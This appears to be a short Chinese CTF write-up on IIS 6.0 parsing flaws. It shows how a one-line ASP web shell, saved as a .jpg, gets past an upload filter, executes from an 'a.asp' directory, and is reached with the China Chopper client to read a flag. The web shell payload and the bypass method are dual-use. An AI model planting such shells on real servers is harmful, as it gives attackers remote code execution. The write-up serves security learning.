IIS6.0 有以下文件解析漏洞:
- 在文件夹为 asp, asa 内的所有文件都会被当成asp脚本进行解析;
- 文件名如:xxx.asp;yyy.jpg 的文件,会忽略分号后面的后缀,将该文件当成asp脚本进行解析
- asa、cer、cdx 也会被当成asp脚本进行解析
查看源码:
image.png
这里只允许后缀为 jpg 的文件上传,
我的一句话木马内容为:
<%eval request("heroes")%>
保存为 ladybird253.jpg,上传结果如下:
image.png
可以看到上传后的文件所在的目录为 a.asp,这就可以利用 开头提到的 IIS6.0 的解析漏洞,在 xxx.asp 目录下的文件都会被当做asp脚本。
然后用菜刀连接:
image.png
进入保存上传文件的目录中找到flag文件:
image.png











网友评论